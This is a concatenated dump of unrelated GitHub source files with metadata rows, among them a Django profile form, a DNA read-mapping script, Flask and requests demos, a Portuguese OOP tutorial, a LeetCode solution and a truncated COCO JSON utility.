] | permissive | fergalmoran/dss | 7c690ba0b858c3d7d115af54655954ecee64407e | 684fb4030e33212c3ecde774ca86cb74a1ffc8ac | refs/heads/master | 2021-07-06T02:46:49.064282 | 2015-01-04T22:19:31 | 2015-01-04T22:19:31 | 5,353,985 | 0 | 0 | BSD-2-Clause | 2021-06-10T17:35:38 | 2012-08-09T10:03:17 | JavaScript | UTF-8 | Python | false | false | 2,139 | py | from django import forms
from django.contrib.auth.models import User
from django.forms.models import ModelForm
from spa.models.userprofile import UserProfile
class UserForm(ModelForm):
    """Profile-editing form for ``User`` plus avatar source/upload fields.

    NOTE(review): ``FormHelper``, ``Layout``, ``Fieldset``, ``FormActions``
    and ``Submit`` come from django-crispy-forms but are never imported in
    this module -- instantiating the form raises ``NameError`` until e.g.
    ``from crispy_forms.helper import FormHelper`` (and friends) is added.
    """
    # Where the avatar image comes from; 'custom' enables the upload field.
    avatar_image_select = forms.ChoiceField(
        choices=(
            ('gravatar', "Use gravatar image."),
            ('social', "Use Twitter/Facebook image."),
            ('custom', "Use custom image (upload below).")
        ),
        label="Avatar Image",
        widget=forms.RadioSelect,
        # BUG FIX: the original initial value 'option_gravatar' is not one of
        # the choice keys, so no radio button was preselected.
        initial='gravatar',
        help_text="Select the source of your avatar image."
    )
    # Optional upload, only meaningful when 'custom' is selected.
    avatar_image = forms.ImageField(
        label="",
        required=False
    )
    class Meta:
        model = User
        fields = ('email', 'first_name', 'last_name')
    def __init__(self, *args, **kwargs):
        super(UserForm, self).__init__(*args, **kwargs)
        # crispy-forms layout: one fieldset plus save/cancel buttons.
        # NOTE(review): 'display_name' is referenced here but is neither a
        # declared form field nor in Meta.fields -- verify it is provided
        # elsewhere or remove it from the layout.
        self.helper = FormHelper()
        self.helper.layout = Layout(
            Fieldset(
                'User details',
                'display_name',
                'email',
                'first_name',
                'last_name',
                'avatar_image_select',
                'avatar_image'
            ),
            FormActions(
                Submit('save_changes', 'Save changes', css_class="btn-primary"),
                Submit('cancel', 'Cancel'),
            )
        )
        self.helper.form_class = 'form-horizontal'
        self.helper.form_id = 'id-new-user-form'
        self.helper.form_method = 'post'
        self.helper.form_error_title = 'Ooopsies'
        self.helper.formset_error_title = 'Ooopsies'
        self.helper.form_show_errors = True
    def save(self, *args, **kwargs):
        """Save the User, then create/update the linked UserProfile."""
        user = super(UserForm, self).save(*args, **kwargs)
        # BUG FIX: the original used ``filter(...)[0]`` followed by an
        # ``is None`` check; an empty queryset raises IndexError before the
        # check can ever run.  ``first()`` returns None for an empty queryset.
        profile = UserProfile.objects.filter(user=user).first()
        if profile is None:
            profile = UserProfile()
            profile.user = user
        profile.avatar_type = self.cleaned_data['avatar_image_select']
        profile.avatar_image = self.cleaned_data['avatar_image']
        # and so on with the remaining fields
        profile.save()
        return profile
| [
"fergal.moran@gmail.com"
] | fergal.moran@gmail.com |
ca7bd8dbfa94556f4e6d86d74e718738f11b078c | a507b5f72182d0f46f967d8c6816b4b816341b60 | /python/WorksharingSession.UsesCentralModel.py | 89976d13c9874f3170bcee040165a38b6cecfcec | [
"MIT"
] | permissive | BIMpraxis/Journalysis | c00d167a783b636fcf8104738bf84ef36578a1c7 | af0c042b28d01ba5e44dafc2bbe9556434e897b8 | refs/heads/master | 2020-04-18T20:37:44.456123 | 2019-01-26T22:01:22 | 2019-01-26T22:01:22 | 167,742,529 | 0 | 0 | MIT | 2019-01-26T21:46:42 | 2019-01-26T21:46:42 | null | UTF-8 | Python | false | false | 324 | py | import clr
def process_input(func, input):
    """Apply *func* to a single value, or element-wise over a list of values."""
    if not isinstance(input, list):
        return func(input)
    return [func(item) for item in input]
def WSSessionUsesCentralModel(wssess):
    """Return ``UsesCentralModel()`` for a WorksharingSession, else None.

    The input is identified by its repr, as Dynamo wraps Revit API objects.
    """
    if wssess.__repr__() == 'WorksharingSession':
        return wssess.UsesCentralModel()
    return None
# Dynamo node entry point: IN[0] may be one WorksharingSession or a list of
# them; OUT mirrors that shape.  ``IN`` and ``OUT`` are injected by the
# Dynamo Python-script node environment.
OUT = process_input(WSSessionUsesCentralModel,IN[0])
"dieckmann@caad.arch.rwth-aachen.de"
] | dieckmann@caad.arch.rwth-aachen.de |
2f82f686a54d9e5d0f155c31f1dbc15af4e2c8f9 | 5f34e0e59954c0e8991eb8cfb1d58c0cefcf4c68 | /script/Mapper1.py | 0869f0bed1375b84a0b2b4093a4ea18b130c3356 | [] | no_license | ChenddatHKU/PAlib240 | cd31ca5e8e3b5796721cb77d7bc3861a78e1a358 | c38048900b10fe755a70a13f9cd18585d75922e4 | refs/heads/master | 2022-12-10T21:51:57.974611 | 2016-07-07T06:27:49 | 2016-07-07T06:27:49 | 293,680,127 | 0 | 0 | null | 2020-09-08T02:28:09 | 2020-09-08T02:28:09 | null | UTF-8 | Python | false | false | 4,233 | py | #!/usr/bin/python
import os
import sys
import glob
import string
import operator
from string import atof
from itertools import imap
from Bio import SeqIO
def rc(seq):
    """Return the reverse complement of DNA string *seq*.

    Handles IUPAC ambiguity codes, preserves case, and leaves characters
    without a defined complement (e.g. 'N') unchanged.
    """
    # PORTABILITY FIX: ``string.maketrans`` was removed in Python 3; prefer
    # ``str.maketrans`` and fall back to the old function on Python 2.
    try:
        maketrans = str.maketrans
    except AttributeError:
        maketrans = string.maketrans
    complements = maketrans('acgtrymkbdhvACGTRYMKBDHV',
                            'tgcayrkmvhdbTGCAYRKMVHDB')
    return seq.translate(complements)[::-1]
def hamming(str1, str2):
    """Return the Hamming distance between two equal-length strings."""
    assert len(str1) == len(str2)
    # PORTABILITY FIX: ``itertools.imap`` no longer exists in Python 3; a
    # generator over ``zip`` computes the identical sum of mismatches on
    # both Python 2 and 3.
    return sum(c1 != c2 for c1, c2 in zip(str1, str2))
def list2string(l):
    """Return a new list with every element of *l* converted to ``str``."""
    # IDIOM FIX: replace the manual append loop with a list comprehension.
    return [str(item) for item in l]
def string2atof(l):
    """Return a new list with every element of *l* converted to ``float``.

    PORTABILITY FIX: ``string.atof`` was removed in Python 3; the builtin
    ``float`` is its direct equivalent (``atof`` delegated to it).
    """
    return [float(item) for item in l]
def readrecord(filename, outfile):
    """Flatten a FASTQ file into tab-separated ``ID<TAB>seq<TAB>qual`` lines.

    Quality scores are '-'-joined integers so each record fits one line.
    Raises AssertionError when a record ID appears twice.
    """
    seen_ids = set()
    # ``with`` guarantees the output handle is flushed and closed.
    with open(outfile, 'w') as out:
        for record in SeqIO.parse(filename, "fastq"):
            ID = record.id
            # BUG FIX: the original kept an empty dict that was never
            # populated, so its duplicate-ID assertion could never fire;
            # ``has_key`` was also removed in Python 3.
            assert ID not in seen_ids
            seen_ids.add(ID)
            qual = list2string(record.letter_annotations["phred_quality"])
            out.write(str(ID) + "\t" + str(record.seq) + "\t" + '-'.join(qual) + "\n")
def offsetcheck(R_seq,refseqs):
    """Locate a 240 bp window of *R_seq* matching one of *refseqs*.

    Every start offset is scanned; a window matches a reference when its
    forward ('F') or reverse-complement ('R') sequence is within 6
    mismatches.  Returns ``[reference_name, offset, strand]`` for the first
    hit, or the string ``'bad'`` when nothing matches.
    """
    last_start = len(R_seq) - 240
    for start in range(0, last_start + 1):
        window = R_seq[start:start + 240]
        window_rc = rc(window)
        for ref, refseq in refseqs.items():
            # Forward orientation wins when both orientations would match.
            if hamming(refseq, window) <= 6:
                return [ref, start, 'F']
            if hamming(refseq, window_rc) <= 6:
                return [ref, start, 'R']
    return 'bad'
def MapNPair(R1tmp, R2tmp,mfile,refseqs):
    """Pair flattened R1/R2 reads, QC them, and call mutations vs. *refseqs*.

    Reads the tab-separated files written by readrecord (assumed record-
    aligned line by line), keeps only high-quality concordant pairs, and
    writes ``amplicon<TAB>barcode<TAB>mutations`` lines to *mfile*.
    Python 2 only (xreadlines, print statement).
    """
    R1file = open(R1tmp,'r')
    R2file = open(R2tmp,'r')
    mfile = open(mfile,'w')
    badBC = 0
    total = 0
    for line in R1file.xreadlines():
        # First 4 bases are the barcode; the rest is the read sequence.
        R1record = line.rstrip().rsplit("\t")
        R1_ID = R1record[0]
        R1_bc = R1record[1][0:4]
        R1_seq = R1record[1][4::]
        R1_qual = string2atof(R1record[2].rsplit('-'))
        R2record = R2file.readline().rstrip().rsplit("\t")
        R2_ID = R2record[0]
        R2_bc = R2record[1][0:4]
        R2_seq = R2record[1][4::]
        R2_qual = string2atof(R2record[2].rsplit('-'))
        #QUALITY CONTROL#
        # Pairs must share an ID and a barcode, and be long enough to hold
        # a full 240 bp amplicon window.
        total += 1
        assert(R1_ID == R2_ID)
        if R1_bc != R2_bc:
            badBC += 1
            continue
        if len(R1_seq) < 240: continue
        if len(R2_seq) < 240: continue
        #END OF QUALITY CONTROL#
        #EXTRACT OFFSET INFO
        R1_info = offsetcheck(R1_seq,refseqs)
        R2_info = offsetcheck(R2_seq,refseqs)
        #QUALITY CONTROL#
        # Both mates must map, to the same amplicon, on opposite strands.
        if R1_info == 'bad' or R2_info == 'bad': continue
        if R1_info[0] != R2_info[0]: continue
        if R1_info[2] == R2_info[2]: continue
        #END OF QUALITY CONTROL#
        #CALL MUTATION
        WT_Amp = R1_info[0]
        refseq = refseqs[WT_Amp]
        R1_offset = R1_info[1]
        R1_strand = R1_info[2]
        R2_offset = R2_info[1]
        R2_strand = R2_info[2]
        # Trim both mates to their mapped 240 bp window and orient them to
        # the forward strand before comparison.
        R1_seq = R1_seq[R1_offset:R1_offset+240]
        R1_qual = R1_qual[R1_offset:R1_offset+240]
        R2_seq = R2_seq[R2_offset:R2_offset+240]
        R2_qual = R2_qual[R2_offset:R2_offset+240]
        if R1_strand == 'R': R1_seq = rc(R1_seq); R1_qual.reverse()
        if R2_strand == 'R': R2_seq = rc(R2_seq); R2_qual.reverse()
        #QUALITY CONTROL#
        # Only perfectly concordant mate pairs are kept; the per-base
        # quality filters are intentionally disabled below.
        if R1_seq != R2_seq: continue
        #if min(R1_qual) < 30: continue
        #if min(R2_qual) < 30: continue
        #END OF QUALITY CONTROL#
        # Record each mismatch as ref-base, 1-based position, read-base.
        Muts = []
        for n in range(0,len(refseq)):
            if R1_seq[n] != refseq[n] and R1_seq[n] == R2_seq[n]:
                Mut = refseq[n]+str(n+1)+R1_seq[n]
                Muts.append(Mut)
        if len(Muts) == 0:
            Muts = ['WT']
        mfile.write(WT_Amp+"\t"+R1_bc[0:3]+"\t"+'-'.join(Muts)+"\n")
    R1file.close()
    R2file.close()
    mfile.close()
    print badBC, 'bad barcodes out of:', total
#READ IN REFERENCE SEQUENCE
# Parse the amplicon FASTA into {name: sequence}; assumes one sequence
# line per '>' header (no wrapped sequences).  Python 2 (xreadlines).
reffile = open('Fasta/flu3amp.fa','r')
refseqs = {}
for line in reffile.xreadlines():
    if '>' in line:
        ID = line.rstrip().replace('>','')
    else:
        refseqs[ID] = line.rstrip()
#MAIN#
# For each R1 fastq, flatten R1 and its matching R2, map the pairs, then
# concatenate all per-sample mutation files into the final result.
# NOTE(review): fileID assumes a fixed '_'-delimited fastq naming scheme.
filenames = sorted(glob.glob('fastq/*_R1_*.fastq'))
for filename in filenames:
    print filename
    fileID = filename.rsplit('_')[4].rsplit('.')[0]
    R1file = filename
    R2file = filename.replace('_R1_','_R2_')
    R1tmp = 'Read/'+fileID+'_R1'
    R2tmp = 'Read/'+fileID+'_R2'
    mfile = 'tmp/'+fileID+'.m'
    readrecord(R1file,R1tmp)
    readrecord(R2file,R2tmp)
    MapNPair(R1tmp,R2tmp,mfile,refseqs)
os.system('cat tmp/*.m > result/AllM_3')
os.system('rm tmp/*')
| [
"wchnicholas@Nicholass-MacBook-Pro.local"
] | wchnicholas@Nicholass-MacBook-Pro.local |
864c00875017a868edaf771c62696c1523eb9c33 | c61798997614f4430a6a56b16e8d17fe75fb2f9c | /Yurii_Khomych/l_12_networking/http/example4_requests.py | bbbd1aeb087ff1dcf127b910a31d9a11e7c46132 | [] | no_license | YuriiKhomych/ITEA_AC | ad944bbe74be88f306a45f38efa70765c5286162 | f9eb147da1135a978929ae370d9c9fcd8dc59d21 | refs/heads/master | 2022-12-18T14:55:56.162451 | 2020-05-03T12:45:02 | 2020-05-03T12:45:02 | 234,373,863 | 0 | 9 | null | 2022-12-08T03:46:33 | 2020-01-16T17:26:50 | Python | UTF-8 | Python | false | false | 295 | py | import requests
# pip install requests
# One request per common HTTP verb against the local example server; each
# call blocks until a response arrives.  NOTE(review): requires the server
# from the earlier examples to be listening on localhost:8888.
response1 = requests.get("http://localhost:8888")
response2 = requests.put("http://localhost:8888")
response3 = requests.post("http://localhost:8888")
response4 = requests.delete("http://localhost:8888")
response5 = requests.head("http://localhost:8888")
| [
"yuriykhomich@gmail.com"
] | yuriykhomich@gmail.com |
c930dbb97f7c177dc265d89c15a148b09c9a5b7a | 5c62ad2ab20bf950567ede70b7fe40b538b68168 | /Capitulos/Secao_16/atributos.py | 20ed20d46cdaae09233ff93d43fddf4eb43988cd | [] | no_license | Andremarcucci98/Python_udemy_geek_university | 0e9c8f2ff007e3095574d3964f45f5991dbe3437 | 1c487262f85542a82ceb5f222af675b8a00136f1 | refs/heads/master | 2023-03-30T20:18:43.022405 | 2021-04-01T15:41:22 | 2021-04-01T15:41:22 | 353,747,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,413 | py | """
POO - Atributos
Atributos -> Representam as características do objeto, ou seja, pelos atributos nós conseguimos representar
computacionalmente os estados de um objeto.
Em Python, dividimos os atributos em tres grupos:
- Atributos de instância;
- Atributos de classe;
- Atributos Dinâmicos;
# Atributo de Instância: São atributos declarados dentro do método construtor
# Obs.: Método Construtor é um método especial utilizado para construção do objeto.
# Em Java, uma classe Lampada, incluindo seus atributos ficariam mais ou menos:
public classe Lampada(){
private int voltage;
private String cor;
private Boolean ligada = false;
public Lampada(int voltage, String cor){
this.voltage = voltage;
this.cor = cor;
}
public int getVoltagem(){
return this.voltagem;
}
}
# Classes com atributos de instância públicos
class Lampada:
def __init__(self, voltagem, cor):
self.voltagem = voltagem
self.cor = cor
self.ligada = False
class ContaCorrente:
def __init__(self, numero, limite, saldo):
self.numero = numero
self.limite = limite
self.saldo = saldo
class Produto:
def __init__(self, nome, descricao, valor):
self.nome = nome
self.descricao = descricao
self.valor = valor
class Usuario:
def __init__(self, nome, email, senha):
self.nome = nome
self.email = email
self.senha = senha
# Atributos públicos e Atributos privados
Em Python, por convenção, ficou estabelecido que, todo atributo de uma classe é público
Ou seja, pode ser acessado em todo o projeto
Caso queiramos demonstrar que determinado atributo deve ser tratado como privado, ou seja,
que deve ser acessado/utilizado somente dentro da própria classe onde está declarado,
utiliza-se __ duplo underscore no inicio de seu nome.
Isso é conhecido também como Name Mangling.
class Acesso:
def __init__(self, email, senha):
self.email = email
self.__senha = senha
def mostra_senha(self):
print(self.__senha)
def mostra_email(self):
print(self.email)
# Obs.: Lembre-se que isso é apenas uma convenção, ou seja, a linguagem Python não
vai impedir que façamos acesso aos atributos sinalizados como privados fora da classe.
# Exemplo
user = Acesso('user@gmail.com', '123456')
#print(user.email)
#print(user.__senha) # AttributeError
print(user._Acesso__senha) # Temos acesso, mas não deveriamos fazer este acesso. (Name Mangling)
print(dir(user))
user.mostra_senha()
user.mostra_email()
# O que significa atributos de instância?
# Significa que ao criarmos instâncias/objetos de uma classe, todas as instâncias terão estes atributos.
user1 = Acesso('user1@gmail.com', '123456')
user2 = Acesso('user2@gmail.com', '678910')
user1.mostra_email()
user2.mostra_email()
# Atributos de Classe
p1 = Produto('Playstation 4', 'Video game', 2300)
p2 = Produto('XBOX S', 'Video game', 4500)
# Atributos de classe, atributos, claro, que são declarados diretamente na classe, ou seja,
# fora do construtor. Geralmente já inicializamos um valor e este valor é compartilhado entre
# todas as instâncias da classe. Ou seja, ao invés de cada instância da classe ter seus próprios
# valores como é o caso dos atributos de instância, com os atributos de classe todas as instâncias
# terão o mesmo valor para este atributo.
# Refatorando a classe Produto
class Produto:
#Atributo de classe
imposto = 1,05 # 0.05% de imposto
contador = 0
def __init__(self, nome, descricao, valor):
self.id = Produto.contador + 1 # Atributo de instância
self.nome = nome # Atributo de instância
self.descricao = descricao # Atributo de instância
self.valor = (valor * Produto.imposto) # Atributo de instância
Produto.contador = self.id # Atributo de classe
p1 = Produto('Playstation 4', 'Video game', 2300)
p2 = Produto('XBOX S', 'Video game', 4500)
print(p1.valor) # Acesso possivel, mas incorreto de um atributo de classe
print(p2.valor) # Acesso possivel, mas incorreto de um atributo de classe
# Obs.: Não precisamos criar uma instância de uma classe para fazer acesso a um atributo de classe
print(Produto.imposto) # Acesso correto de um atributo de classe
print(p1.id)
print(p2.id)
# Obs.: Em linguagens como Java, os atributos conhecidos como atributos de classe aqui em Python
# são chamados de atributos estáticos.
# Atributos Dinâmicos -> Um atributo de instância que pode ser criado em tempo de execução.
# Obs.: O atributo dinâmico será exclusivo da instância que o criou
p1 = Produto('Playstation 4', 'Video game', 2300)
p2 = Produto('Arroz', 'Mercearia', 5.99)
# Criando um atributo dinâmico em tempo de execução
p2.peso = '5kg' # Note que na classe Produto não existe o atributo peso
print(f'Produto: {p2.nome}, Descrição: {p2.descricao}, Valor: {p2.valor}, Peso: {p2.peso}')
#print(f'Produto: {p1.nome}, Descrição: {p1.descricao}, Valor: {p1.valor}, Peso: {p1.peso}') # AttributeError
# Deletando atributos
print(p1.__dict__)
print(p2.__dict__)
# print(Produto.__dict__)
del p2.peso
del p2.valor
del p2.descricao
print(p1.__dict__)
print(p2.__dict__)
""" | [
"marcuccimaciel.andre@gmail.com"
] | marcuccimaciel.andre@gmail.com |
929d1f1387585f01edaaa96587f151f481d5cb44 | b0856a2d66cc4c71705b8c16c169848070294cf6 | /Summary Ranges.py | ac541772efa8a7aabf421c8fd4beab2846344137 | [] | no_license | jfriend08/LeetCode | 9e378ff015edc3102a4785b0832cf0eeb09f5fc2 | f76d3cf2e7fd91767f80bd60eed080a7bad06e62 | refs/heads/master | 2021-01-21T19:28:25.354537 | 2016-01-15T04:53:11 | 2016-01-15T04:53:11 | 28,518,328 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py | """
Given a sorted integer array without duplicates, return the summary of its ranges.
For example, given [0,1,2,4,5,7], return ["0->2","4->5","7"].
Credits:
Special thanks to @jianchao.li.fighter for adding this problem and creating all test cases.
"""
class Solution(object):
    def summaryRanges(self, nums):
        """Summarize a sorted, duplicate-free integer list into range strings.

        E.g. [0, 1, 2, 4, 5, 7] -> ["0->2", "4->5", "7"].

        :param nums: sorted list of unique integers (may be empty)
        :return: list of strings, "a->b" for multi-element runs, "a" otherwise

        Fixes over the original: removes the unused ``isContinue`` variable,
        the ``== None`` comparison, and the redundant special-casing of
        0/1-element inputs; the run-formatting logic now lives in one place.
        """
        ranges = []
        if not nums:
            return ranges

        def emit(start, end):
            # A one-element run renders as "a", a longer one as "a->b".
            ranges.append(str(start) if start == end else "%s->%s" % (start, end))

        start = nums[0]
        for prev, cur in zip(nums, nums[1:]):
            if cur - prev != 1:  # gap found: close the current run
                emit(start, prev)
                start = cur
        emit(start, nums[-1])  # close the final run
        return ranges
"ys486@cornell.edu"
] | ys486@cornell.edu |
ff13fbb8d07d76da28b56a59006d1440f8e4a641 | b0f327f70fad635664fd13b17414b5fea61b73f6 | /flask-tutorial/hello_tests/http_methods.py | 3ccf6610a020730c2d38e917c39920e6c9f7cd8a | [] | no_license | chelseyrandolph/flask-web | 7b70953f8d76840c33f6e30fa05072b5459ee8d2 | 1ed5b51ef18b898eb540ceaf4c6fb37ad227c904 | refs/heads/master | 2020-12-06T11:33:56.184928 | 2020-01-09T21:50:50 | 2020-01-09T21:50:50 | 232,452,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | from flask import request, Flask
app = Flask(__name__)


def do_the_login():
    """Handle a submitted login form (POST branch)."""
    return 'Logging in'


def show_the_login_form():
    """Render the login form (GET branch)."""
    return 'Username:\nPassword:'


# Bug fix: the route decorator was on do_the_login(), so login() — the
# function that actually inspects request.method — was never registered
# and every request to /login returned 'Logging in'. The Flask quickstart
# places the route on the dispatcher.
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Dispatch /login: POST performs the login, GET shows the form."""
    if request.method == 'POST':
        return do_the_login()
    else:
        return show_the_login_form()
"chelseyrrandolph@gmail.com"
] | chelseyrrandolph@gmail.com |
c64f94ddcdfa8c5157ada222b81f8e74d880c758 | 58dd067b747aac2bf6a0f798c76de6312b6915dd | /1_base_OO_net/day25_interface/04_Polymorphism.py | fed82cef4909d524692b362c01e2949f55e129dd | [] | no_license | Nishinomiya0foa/Old-Boys | b4f5d0e6d8b384b55dfb8b8dc21d65152073315a | b771e01bab8dd99f612042e3335f1d36d3657009 | refs/heads/master | 2020-04-24T15:09:35.855357 | 2019-05-19T00:28:24 | 2019-05-19T00:28:24 | 172,054,441 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | """多态 Polymorphism
多态:多个不同的类具有共同的方法func,调用方法func,得到的返回值不同。
把这个方法func提取出来,封装为一个接口g。不同类的实例作为参数传入接口g,得到不同的返回值
python,天生支持多态,是多态语言,python崇尚鸭子类型。
鸭子类型:不崇尚继承父类或实现接口而拥有方法或属性,而是依据其本身的方法或属性的集合决定
例如: list类和tuple类,非常相似,也没有采用继承的方式
优点:低耦合
缺点:太过自由
python是一门动态强类型语言。
"""
class WeChat:
    """WeChat payment backend; duck-types the shared pay(money) interface."""

    def pay(self, money):
        """Print a receipt for paying *money* via WeChat."""
        receipt = '使用wechat支付了{}元'.format(money)
        print(receipt)
class Alipay:
    """Alipay payment backend; duck-types the shared pay(money) interface."""

    def pay(self, money):
        """Print a receipt for paying *money* via Alipay."""
        receipt = '使用Alipay支付了{}元'.format(money)
        print(receipt)
def pay(pay_obj, money):
    """Unified payment entry point (统一支付入口).

    Duck typing: any object exposing a ``pay(money)`` method works.
    """
    pay_obj.pay(money)
"mxstarbucks@sina.com"
] | mxstarbucks@sina.com |
cd2b2ba7963e038c41beeeb56467be21de72616e | f94d95c48589cc8ffb50b4e5cd24bc8847026351 | /sendhut/views.py | 8380871b8a96495c5f42a90165de9013602e82fc | [] | no_license | rpip/sendhut-essentials | 6a3c93edae6f2233a56e64445040287ab97eb011 | fb17b2418bd7a54115cc9847d36656a10895d57a | refs/heads/master | 2021-06-18T17:46:28.395697 | 2019-08-21T21:54:23 | 2019-08-21T21:54:23 | 203,622,656 | 0 | 1 | null | 2021-06-10T21:53:07 | 2019-08-21T16:23:47 | Python | UTF-8 | Python | false | false | 666 | py | from django.shortcuts import render
from sendhut.stores.models import Store
def home(request):
    """Render the landing page listing the featured stores."""
    featured_stores = Store.featured.all()
    return render(request, 'home.html', {
        'page_title': 'Home',
        'stores': featured_stores,
    })
def about(request):
    """Render the static About Us page."""
    context = {'page_title': 'About Us'}
    return render(request, 'about.html', context)
def faqs(request):
    """Render the frequently-asked-questions page."""
    context = {'page_title': 'FAQs'}
    return render(request, 'faqs.html', context)
def privacy(request):
    """Render the privacy policy page."""
    context = {'page_title': 'Privacy Policy'}
    return render(request, 'privacy.html', context)
def terms(request):
    """Render the terms-and-conditions page."""
    context = {'page_title': 'Terms and Conditions'}
    return render(request, 'terms.html', context)
| [
"yao.adzaku@gmail.com"
] | yao.adzaku@gmail.com |
af82dbeedab330a88c7be75a7a5f2fd5bb84b030 | d0533b0574494b13606a557620f38f5a2c74ce16 | /venv/lib/python3.7/site-packages/mplfinance/_styledata/default.py | 93deed9a6e48a0a650cd69b8944f407f23590dfd | [
"GPL-1.0-or-later",
"MIT",
"LicenseRef-scancode-other-copyleft"
] | permissive | CatTiger/vnpy | af889666464ab661fb30fdb0e8f71f94ba2d1e41 | 7901a0fb80a5b44d6fc752bd4b2b64ec62c8f84b | refs/heads/master | 2020-09-26T00:37:54.123877 | 2020-07-13T10:15:46 | 2020-07-13T10:15:46 | 226,124,078 | 0 | 0 | MIT | 2020-04-21T03:02:20 | 2019-12-05T14:44:55 | C++ | UTF-8 | Python | false | false | 1,499 | py | style = dict(style_name = 'default',
base_mpl_style= 'seaborn-darkgrid',
marketcolors = {'candle' : {'up':'w', 'down':'k'},
'edge' : {'up':'k', 'down':'k'},
'wick' : {'up':'k', 'down':'k'},
'ohlc' : {'up':'k', 'down':'k'},
'volume' : {'up':'#1f77b4', 'down':'#1f77b4'},
'vcedge' : {'up':'#1f77b4', 'down':'#1f77b4'},
'vcdopcod': False, # Volume Color is Per Price Change On Day
'alpha' : 0.9,
},
mavcolors = ['#40e0d0','#ff00ff','#ffd700','#1f77b4',
'#ff7f0e','#2ca02c','#e377c2'],
y_on_right = False,
gridcolor = None,
gridstyle = None,
facecolor = '#DCE3EF',
rc = [ ('axes.edgecolor' , 'black' ),
('axes.linewidth' , 1.5 ),
('axes.labelsize' , 'large' ),
('axes.labelweight', 'semibold'),
('lines.linewidth' , 2.0 ),
('font.weight' , 'medium' ),
('font.size' , 12.0 ),
],
base_mpf_style= 'default'
)
| [
"guozc@133.com"
] | guozc@133.com |
678c1791f35c404611be00fcd77d75f8713773d3 | 9be1f3ffd2339e752f91eee86305076575309e33 | /AGC.py | 8d321f8a50917a8d84243691759588b6d622599a | [] | no_license | Index197511/AtCoder_with_Python | 5b48290bc32ad86aa58f66ad7c0e3510a2ea5518 | 7397e5df42371d1717b77442d3876787facf9641 | refs/heads/master | 2020-04-11T18:48:15.935498 | 2019-06-05T10:57:42 | 2019-06-05T10:57:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | py | n=int(input())
# a holds the integers read from stdin (n itself was read just above).
a=list(map(int,input().split()))
# Running count of contiguous subarrays whose elements sum to zero.
cnt=0
for i in range(n):
    tot=0
    j=i
    while True:
        # NOTE(review): breaking before adding a[n-1] means subarrays that
        # include the last element are never counted — confirm this is intended.
        if j==(n-1):
            break
        tot+=a[j]
        # tot == 0 here means a[i..j] sums to zero.
        if tot==0:
            cnt+=1
        j+=1
        if j==(n-1):
            break
    # NOTE(review): printed once per outer iteration, so intermediate counts
    # are emitted; the final printed line carries the total.
    print(int(cnt))
| [
"hiro.saten@gmail.com"
] | hiro.saten@gmail.com |
db127761ae4ceb1bb63c04c61b631726e6298d19 | 4f7aa44d21ae38093869e79e10f5cdc8842d48b7 | /04-python-academy-files-lab/try_except_finally.py | 986d23e6c750e312790b2ad50d384dde4cdbef7b | [
"Apache-2.0"
] | permissive | iproduct/intro-python | 31e802c2c21a4df3361656f12d267ec52c2d6564 | 7e08e144da2907fcf45dc734ab4e896631625d75 | refs/heads/master | 2023-02-19T11:42:37.522624 | 2023-02-13T15:54:03 | 2023-02-13T15:54:03 | 128,980,155 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 763 | py | import sys
from io import UnsupportedOperation
# Demo of try/except/else/finally ordering with a nested handler pair.
if __name__ == '__main__':
    FILENAME = "demofile.txt"
    try:
        # Opened read-only ("rt"), so any successful write() call would fail.
        f = open(FILENAME, "rt")
        try:
            # NOTE(review): the argument is evaluated before write() runs, and
            # "Lorum Ipsum" + 12 raises TypeError — so the UnsupportedOperation
            # handler below is bypassed and the generic Exception handler fires
            # instead. Confirm whether the "+ 12" is intentional.
            f.write("Lorum Ipsum" + 12)
        except UnsupportedOperation as ex:
            # Reached only when write() itself rejects the read-only handle.
            print("The file is not open for writing")
            print(f"Error: {ex}, {type(ex)=}")
            # raise ex
        except Exception as ex:
            print("Something went wrong when writing to the file:", ex)
            # Re-raised, so the outer bare except below also runs.
            raise ex
        else:
            # else: runs only when the inner try body raised nothing.
            print("Data wtritten to file successfully.")  # NOTE(review): "wtritten" typo in message
        finally:
            # finally: always runs, exception or not, before leaving the try.
            print("Closing file:", FILENAME)
            f.close()
    except:
        # Bare except catches everything here, including the re-raised error
        # above and a FileNotFoundError from open().
        print("Something went wrong with the file")
        # raise ex
    print("More work to do ...")
"office@iproduct.org"
] | office@iproduct.org |
268aa267950f36e59e87d3f85502504bad9f0e40 | c34a0e0308b97de8605b3189c4510aa8f265580b | /cocojson/tools/match_imgs.py | ee16d079b9d8b99336b8df97edbbc934e7d83808 | [
"MIT"
] | permissive | TeyrCrimson/cocojson | c1aa671d2e092677abb6de473ffd87c3a18bd3ae | edf4300daadb7f26d15c3ba6be72f60667a4ff3a | refs/heads/main | 2023-06-02T03:41:33.939082 | 2021-06-23T08:36:55 | 2021-06-23T08:36:55 | 379,777,169 | 0 | 0 | MIT | 2021-06-24T02:05:00 | 2021-06-24T02:04:59 | null | UTF-8 | Python | false | false | 1,702 | py | '''
Match images between COCO JSON A and COCO JSON B. Any images in JSON B that is not found in JSON A will be removed (along with associated annotations)
Match will be through image `file_name`.
'''
from warnings import warn
from cocojson.utils.common import read_coco_json, write_json_in_place
def match_imgs_from_file(cocojsonA, cocojsonB, outjson=None):
    """Trim COCO json B to the images of COCO json A and write the result.

    The output path defaults to cocojsonB with a 'trimmed' suffix appended.
    """
    dict_a, _setname_a = read_coco_json(cocojsonA)
    dict_b, _setname_b = read_coco_json(cocojsonB)
    trimmed = match_imgs(dict_a, dict_b)
    write_json_in_place(cocojsonB, trimmed, append_str='trimmed', out_json=outjson)
def match_imgs(coco_dictA, coco_dictB):
    """Trim coco_dictB in place to the images present (by file_name) in coco_dictA.

    Kept images and their annotations are re-indexed with fresh consecutive ids
    starting at 1; annotations whose image was dropped are removed. A warning is
    emitted for reference images that have no counterpart in coco_dictB.

    :param coco_dictA: reference COCO dict (supplies the set of file_names)
    :param coco_dictB: COCO dict to be trimmed (mutated and returned)
    :return: the trimmed coco_dictB

    Improvement over the original: membership tests use a set, so the scan is
    O(B) instead of O(A*B) for large image lists.
    """
    imgs_A = {img['file_name'] for img in coco_dictA['images']}
    new_imgs = []
    present_imgs = []
    img_id_map = {}  # old image id -> new consecutive id
